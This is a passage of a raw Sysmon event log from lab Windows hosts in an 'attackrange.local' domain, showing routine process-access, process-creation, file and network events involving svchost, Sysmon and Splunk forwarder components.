21:50:50.823{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918389Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.823{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918388Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.823{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918387Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.823{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918386Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.823{896A638B-B5C8-6058-0500-00000000AE01}396356C:\Windows\system32\csrss.exe{896A638B-B43A-605B-9569-00000000AE01}7272C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918385Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.822{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B43A-605B-9569-00000000AE01}7272C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005918384Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.694{896A638B-B43A-605B-9569-00000000AE01}7272C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005918383Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.747{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918382Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.747{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918381Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.881{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local55579- 23542300x80000000000000005918380Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.215{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6A344AD42F7BAD8651A16BE44031DB9,SHA256=2EEE1C61539927DCCA14AD270123B5A4AE1634160AB1A5AEBD8932DEB55B0DCF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918379Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.186{896A638B-B43A-605B-9469-00000000AE01}70442016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918378Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.025{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B43A-605B-9469-00000000AE01}7044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918377Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.023{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918376Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.023{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918375Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.023{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918374Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.023{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918373Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.023{896A638B-B5C8-6058-0500-00000000AE01}396412C:\Windows\system32\csrss.exe{896A638B-B43A-605B-9469-00000000AE01}7044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918372Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.022{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B43A-605B-9469-00000000AE01}7044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005918371Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.014{896A638B-B43A-605B-9469-00000000AE01}7044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000638659Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:45.473{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57265-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000005918398Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:51.928{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B23F35D10035504AFC0DAB7E5D4615,SHA256=7ECDF8105902D0AEBE01F7289E76C8D503B6FFF6E0E6EC4936772FB3E9C98745,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638661Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:51.413{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EED8AA9FBE01EFDA5A4978CF49B2A232,SHA256=1D721E3D2787BB20F783290118995A30F16176467E0A05F4EAB031187BE0C759,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918397Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:51.748{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918396Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:51.748{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918395Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:51.698{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=88DC27B4B1C23C70F03BF474EDE91A48,SHA256=EC5E2EFB9BF83F0BC9BEC6770C3677448B0472DEB8E03EBE0E5BFF66344D1617,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918394Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:51.466{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=868C1FD7DF31430832E3055DC763CC89,SHA256=C2AA38D29B4F5D3D7A60DC91B61C9F2501B95BD95CF0047D8DA03228C58FC95D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005918393Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:47.892{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1049-false10.0.1.12-8000- 23542300x80000000000000005918401Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:52.944{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49830568C21B0309DA1F06C77C0B8AA6,SHA256=FBDB275DF68347DB50AAD2CF69B21823F7A4B8818AB6ABAAFA20D4B417DC2596,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638662Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:52.413{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00DE97BBDABC270599E54F92C0D4D69A,SHA256=DEEE196FF3E7CE2A4609E0E7DD1D00F54EF018EC664903A3E31C6595C831E68F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918400Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:52.748{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918399Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:52.748{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918407Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:53.957{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=812EE99A21E8B57455B633C408036B59,SHA256=4A5FB416752A6F04B54F4BE5ACD7F9D6305A0AEE201F1EF1168C0B851CA31947,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638663Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:53.428{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C20F39CCB52FA8B8A2EB7C87EF9E5829,SHA256=36CAE1EC828680D3A9E539B7748B8EAB5B5CCE77BF0B5D9ADF20C0E7A3B27E8B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918406Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:53.824{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla 